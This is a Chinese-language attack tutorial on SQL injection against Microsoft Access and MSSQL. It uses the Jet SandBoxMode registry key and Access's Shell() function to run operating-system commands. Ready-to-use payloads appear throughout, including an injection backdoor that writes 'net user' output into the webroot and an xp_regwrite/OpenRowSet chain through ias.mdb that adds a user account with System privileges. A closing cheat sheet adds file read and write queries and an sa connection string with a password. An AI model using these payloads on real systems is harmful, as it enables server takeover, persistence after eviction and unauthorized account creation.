现在我们在脚本注入攻击的技术中,常用的手法分好多种,最普通的是利用子查询或者是Union联合查询来取得一些特殊表中的内容,比如Admin,Log表等等,这是一种纯粹的对数据库的攻击方式,而MSSQL Server的方法则更为多样和复杂,
当我们取得连接权限较高的注入点的时候,我们可以利用MSSQL Server本身所带的扩展来执行命令,或者是获取目录,读取文件与修改注册表;在低权用户的连接中,我们则可以试用差异备份,
或者干脆就是跑数据库等方式来实现对系统的直接攻击或者是间接的攻击.再则则是类似于Oracle/MySQL/DB2这些非MS直接支持的数据库关于他们,我们也有多种多样的攻击手法,执行命令,导出文件或读取文件等.
以上是一些我们针对常用数据库的攻击方式的大体总结,不难看出,其中最鸡肋的,要算是Access的数据库了.一来在Access中,无法直接获取数据库中的表名和字段名称,二来在Access中,我们能做的东西非常少,
再说也不支持多语句的SQL语法,和T-SQL的标准又有不少的区别,让人觉得Access数据库中仅有的Insert,Update,Select,Delte,Produce仅仅是对SQL语句的封装而已.所以,我们依旧需要对Access进行研究.
在这篇研究笔记中,我所参考的文章和资料,有部分来自nsfocus和xFocus早在2000-2002年的文档,另一篇则是SuperHei所发表的<关于Access的一些测试>,
大家可以在http://www.4ngel.net/安全天使安全小组的网站上查询到.OK,废话不要太多,我们继续研究.
我们可以去翻看微软在刚推出Windows 2000的时候曾经出现过几个非常大的脚本漏洞的漏洞公告,其中比如cateloy_type.asp的远程注入漏洞和Msadscs.dll漏洞等都涉及了与现在的攻击手法或者是常用的利用方法极为不同的地方,
比如Catelog_type.asp的注入漏洞,它的代码中出现的问题是这样的:
"select * from cateloy where type='" & Requset("Type") & "'"
谁都能看明白这是一个非常低级的注入漏洞,直接将Type的值放入SQL语句中查询,并没有估计到用户的恶意输入.
如果换作现在,我们基本上只有拿来跑表份,幸好MS没设置类似PHP的gpc,否则我们将一事无成.但是我们可以查看这篇漏洞资料的利用方式,其中涉及到了一个SQL语句:
Select * from Sometable where somefield='|Select Shell("cmd.exe /c dir")|'
关于这个语句的介绍,是漏洞资料中所说的,Access允许用"|"来创建VBA函数,导致命令被执行,其实这只是Access内置的一个特殊函数而已,相类似的还有cudir和Command函数.具体的我们可以在Access中测试.测试的SQL语句如下:
Select Shell("cmd.exe /c dir c:/ > c:/kevin.txt")
回到C盘,我们果然看到了kevin.txt.说明语句执行成功了.
然后我们将其转到脚本中测试吧.编写如下的VBS脚本
Set Conn=Createobject("Adodb.Connection")
Conn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=kevins4t.mdb"
Set Rs=Conn.execute("Select Shell(""cmd.exe /c dir c:/ > c:/kevin.txt"")")
Msgbox Rs(0)
这一此出现的结果很出乎我们的意料,错误的原因是"表达式中的'Shell'函数未定义".现在我们需要安静下来喝杯咖啡然后思考为什么同样的语句在不同的执行者间会出现如此截然不同的问题.一个能正常执行,
而另外一个则是找不到函数.试想微软一定在其中的什么地方设置了一个开关,那么我们就去微软的知识库去了解一下.
在微软的一篇关于沙盒模式的文档中,我们了解到一些内容:
为了安全起见,MS在Jet引擎的Sp8中,设置了一个名为SandBoxMode的开关,这个开关是开启一些特殊函数在另外的执行者中执行的权限的.它的注册表位置在
HKEY_LOCAL_MACHINE/SoftWare/Microsoft/Jet/4.0/Engine/SandBoxMode里,默认是2.微软关于这个键值的介绍为:0为在任何所有者中中都禁止起用安全设置,1为仅在允许的范围之内,
2则是必须是Access的模式下(这就是为什么我们能在Access中执行成功的原因.),3则是完全开启,连Access中也不支持.
那么好吧,我们来看看如果将值变为0将会怎样.
这次运行我们的VBS的时候,出现的情况是一组数字,再在C盘下查看文件,果然看到了我们的kevin.txt.很神奇吧.原来Access也是可以执行命令的,只是微软这家伙总是懒得说出来而已.但是如果在实际方面会怎样呢?
一.后门的设置
我们的运用将会很窄.真的,一来我们需要的权限很高,起码要到能改注册表的权限,默认是Admin和LocalSystem,二来是我们将如何修改注册表,远程吗?没门的.所以我们只好将其当作一个后门用.
只要我们修改了注册表的值,那么在普通的注入语句中,这是一个很不错的后门方式,最起码可以在外部执行一些小小的命令什么的.
比如我们在渗透某个站点的时候拿到了最高权限,并且修改了这个SandBoxMode,之后我们被管理员扫地出门了.那么,在首页的某个地方依旧存在这一个Select的注入点,这样最好,我们让服务器执行如下的SQL就行了.
InjectionURL' and 0<>(select shell("cmd.exe /c net user > c:/inetpub/wwwroot/kevins4t.txt"))%00
这样我们就可以一步一步的将重新服务器拿下.
二.远程攻击
这将是一个很有意思的话题.首先我们必须有修改注册表的权限,二是有修改注册表的条件,三是可以执行SandboxMode的环境,必须三样同时满足才行,到底是在什么情况下呢?
我们知道,我们平时在杂志上看到的文章,很多的无非就是在一个以Sa连接的InjectionURL中苦苦挣扎,一是执行命令,如果去掉了扩展或者是将扩展需要的DLL移走,我们将一无所用.那么聪明的你是否想到了方法?
我们知道,只有Sa的权限才有可能去打开另外一个Access的连接的,当我们满足了打开Access的条件的同时,我们也满足了修改注册表的条件和权限,因为MSSQL有一个名为xp_regwrite的扩展,它的作用是修改注册表的值.语法如下
exec maseter.dbo.xp_regwrite Root_Key,SubKey,Value_Type,Value
那我们只要将SandBoxMode修改为0或者1就成功了.然后则是MSSQL的OpenRowSet函数,它用于打开一个特殊的数据库或者连接到另一个数据库之中.当我们具备SysAdmin的权限的时候,我们就可以做到打开Jet引擎.那么我们只要连接到一个Access数据库中,
然后执行命令就可以了.但是关键的问题是如何寻找这个Access数据库.
关于这个问题我以前想了很多,一开始是想,利用目录便历来查询数据库的位置.但是这种方法成功率不会很高,有的时候我们碰到很多的站点都设置了非常好的权限,无法找到MDB数据库.这是最为烦恼的地方.
不过后来我想到了一些前人用过的方式,系统里本来就有2-3个现存的数据库嘛,何必费神的去找呢?它们的位置在%windir%/system32/ias/ias.mdb或者%windir%/system32/ias/dnary.mdb这样一来,我们有了执行宿主,就没什么好怕的了.执行一下我们所需要的命令吧
InjectionURL';Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:/winnt/system32/ias/ias.mdb','select shell("net user kevin 1986 /ad")');--
这样,我们就执行了命令了.而且继承的是MSSQL的LocalService的System权限.

--------------------------------------------------------------------------------------------------------------------------------------------------------

用户表
SELECT Name FROM msysobjects WHERE Type = 1 and flags=0
所有表
SELECT Name FROM msysobjects WHERE Type = 1

判断版本:
SELECT NULL FROM MSysModules2  '97
SELECT NULL FROM MSysAccessObjects '97 2000
SELECT NULL FROM MSysAccessXML '2000 2002-2003
SELECT NULL FROM MSysAccessStorage '2002-2003 2007

SandBoxMode:
SandBoxMode的开关,这个开关是开启一些特殊函数在另外的执行者中执行的权限的.它的注册表位置在
HKEY_LOCAL_MACHINE/SoftWare/Microsoft/Jet/4.0/Engine/SandBoxMode里,默认是2.
微软关于这个键值的介绍为:0为在任何所有者中中都禁止起用安全设置,1为仅在允许的范围之内,
2则是必须是Access的模式下(这就是为什么我们能在Access中执行成功的原因.),3则是完全开启,连Access中也不支持.

执行命令:
Select Shell("cmd.exe /c dir c:/ > c:/kevin.txt")

读文件
SELECT *  FROM [TEXT;DATABASE=c:/;HDR=NO;FMT=Delimited].[kevin.txt]

写文件:【不能在子查询和UNION查询中,实用价值不大】
SELECT "text to write"  into [TEXT;DATABASE=c:/;HDR=NO;FMT=Delimited].[kevin1.txt]

当前路径:sandboxing enable
select curdir() from msysaccessobjects
select dir('c:/ ') from msysaccessobjects
select environ(1) from msysaccessobjects
select filedatetime('c:/boot.ini') from msysaccessobjects
select filelen('c:/boot.ini') from msysaccessobjects
select getattr('c:/ ') from msysaccessobjects
select shell('cmd.exe /c dir c:/ > c:/kevin.txt') from msysaccessobjects

跨文件查询:
SELECT *  FROM dv_address IN 'D:/dailian/bbs/Dvbbs8.2.0_Ac/Data/IPaddress.mdb'

连接MSSQL:
SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=(local);UID=sa;PWD=2853wang; DATABASE=master].Information_Schema.Tables

ACCESS高级注入教程相关推荐

  1. ACCESS高级注入

    现在我们在脚本注入攻击的技术中,常用的手法分好多种,最普通的是利用子查询或者是Union联合查询来取得一些特殊表中的内容,比如Admin,Log表等等,这是一种纯粹的对数据库的攻击方式,而MSSQL ...

  2. sqlmap 注入教程 常用命令大全

    sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage –hh 帮助手册 ...

  3. WEB攻防-通用漏洞SQL读写注入ACCESS偏移注入MYSQLMSSQLPostgreSQL

    目录 知识点 详细 ACCESS偏移注入 读取路径 案例演示 MYSQL-root高权限读写注入 PostgreSQL-高权限读写注入 MSSQL-sa高权限读写执行注入 知识点 1.Access偏移 ...

  4. 网络安全学习--008--SQL注入之Access数据库注入详解

    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 Access注入漏洞详解 一:注入漏洞分析 站库分类: 1.网站分类: 静态网页: 不依赖数据库 灵活性差,制作.更新.维护麻烦 交互 ...

  5. WEB渗透SQL注入【3】[access数据库注入](2)

    SQL注入的分类很多,不同的人也会将注入分成不同的种类,下面笔者将介绍一下常见的分类. 注意:此文章中标点符号在页面中显示可能会转成中文的,自己测试时候语句中的标点一律使用英文输入法状态下的. 1.判 ...

  6. Angular 4 依赖注入教程之一 依赖注入简介

    目录 Angular 4 依赖注入教程之一 依赖注入简介 Angular 4 依赖注入教程之二 组件服务注入 Angular 4 依赖注入教程之三 ClassProvider的使用 Angular 4 ...

  7. SQLMAP注入教程-11种常见SQLMAP使用方法

    一.SQLMAP用于Access数据库注入 (1)猜解是否能注入 win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.a ...

  8. Access数据库注入

    目录 Access数据库 Access数据库中的函数 盲注Access数据库 Sqlmap注入Access数据库 Access数据库 Microsoft Office Access是由微软发布的关系数 ...

  9. java高级教程_高级Java教程

    java高级教程 课程大纲 学习Java基础很容易. 但是,真正钻研该语言并研究其更高级的概念和细微差别将使您成为一名出色的Java开发人员. 网络上充斥着"软","便宜 ...

最新文章

  1. 46W 奖金池等你来战!微众银行第三届金融科技高校技术大赛火热报名中!
  2. MarkDown编辑器基础使用教程
  3. Windows下程序打包发布时的小技巧
  4. gcc编译自定义头文件
  5. 【实验吧】CTF_Web_简单的SQL注入之1
  6. 提高SQL执行性能方案:如何让你的SQL运行得更快
  7. easyUI combobox启用禁用功能写法
  8. 用 python 实现各种排序算法(转)
  9. Echarts:Vue3中使用Echarts
  10. 3D模型格式全解|含RVT、3DS、DWG、FBX、IFC、OSGB、OBJ等70余种
  11. socket编程详解(一)——服务器端
  12. Android Hook技术的简单实现
  13. 密码找回逻辑漏洞总结
  14. Scratch青少年编程能力等级测试模拟题
  15. 二维泊松方程求解--点迭代法
  16. java8 .stream().anyMatch / allMatch / noneMatch用法
  17. springboot整合阿里云视频点播服务Vod——实现视频上传、删除、播放
  18. 技术宅教你如何煎一个特别牛逼且装逼的牛排
  19. 还在死守TCP吗,来看看即将成为HTTP3.0标准协议的QUIC
  20. wps字体颜色怎么改

热门文章

  1. js中unload什么意思_unload是什么意思_unload的翻译_音标_读音_用法_例句_爱词霸在线词典...
  2. 基于《狂神说Java》MySQL--学习笔记
  3. 世界杯结束后,我把自己丢给了华为音乐
  4. 计算机桌面文件夹出现w,电脑桌面上的word文档显示不了W的图标而是显示了纯文本的图标...
  5. figma-组件库建立
  6. 讲座笔记 | 管理世界论文
  7. 手机发烫 不说废话 不讲原理
  8. 第四十五篇 信号上升时间的理解
  9. 计算机的数学知识的手抄报图片大全,关于数学手抄报图片大全
  10. 使命召唤ol codol如何自己选择快速低延时的游戏服务器节点